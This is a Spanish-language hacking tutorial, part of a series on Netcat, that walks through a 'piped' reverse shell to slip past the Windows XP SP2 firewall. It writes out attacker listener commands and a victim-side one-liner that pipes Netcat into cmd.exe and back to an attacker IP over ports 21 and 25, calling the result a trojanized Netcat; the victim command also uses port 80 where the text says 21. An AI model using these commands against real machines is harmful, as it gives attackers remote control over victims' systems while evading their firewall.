Jugando con Netcat VI
Shell volteada o pipelada:Bien hasta ahora nosotros conocemos la tecnica de la shell directa e inversa, probemos la inversa, nos las ingeniamos para que la victima deje un puerto a la escucha...
Este comando camuflado con el metodo del iexplore tendria el mismo efecto, hace saltar el firewall de XP SP2 !!, y por lo tanto nosotros no nos podemos conectar a la victima...
EL firewall de XP SP2
detecta que actua como un servidor y lo
bloquea!!
Asi, que que podemos hacer ??, pues una
shell pipelada o volteada.
Esta técnica se basa en que la mayoria de los firewall aceptan la entrada de datos por el puerto 21 y la salida de estos por el puerto 25, de esta manera podemos burlar al firewall sin matarlo ni agregar el Netcat a la lista de excepciones.
El atacante deberá ejecutar los comandos:
nc –vv –L –p 21 --> La ventana por la que dará las ordenes
nc –vv –L –p 25 --> La ventana por la cual verá el resultado de las mismas.
Y la víctima debe ejecutar:
nc –d <IP_ATACANTE> 80 | cmd.exe | nc –d <IP_ATACANTE> 25Explicacion:
Usamos " pipes ", esto es basicamente un metodo para transmitir datos entre programas, nos conectamos al puerto 21 del atacante, todo lo que recibamos por ese puerto será redirigido a cmd.exe usando " | ", el resultado que dé cmd.exe será a la vez redirigido a la conexion que tenemos con el puerto 25 de la victima.
Por ese motivo las ordenes o comandos debemos escribirlos en la ventana en la que escuchemos el puerto 21 y recibiremos el resultado en el puerto 25.
Por que usamos el puerto 21 (FTP) ?Pues por que el firewall de XP SP2 admite por defecto la entrada de datos por dicho puertos, como tambien la admite por el puerto 80, etc...
Por que usamos el puerto 25 (SMTP) ?Pues basicamente lo mismo que lo anterior, pero en este caso lo permitido es la salida de datos.
Entonces en la nos saldra esto:
En la ventana donde escuchamos el puerto 21 escribiremos los comandos y en la que usamos el puerto 25 veremos el resultado...
Y todo esto sin que
el firewall no diga ni pio!!, la unica forma de que nos funcione un Netcatt troyanizado usando unicamente el Netcat para esquivar el firewall...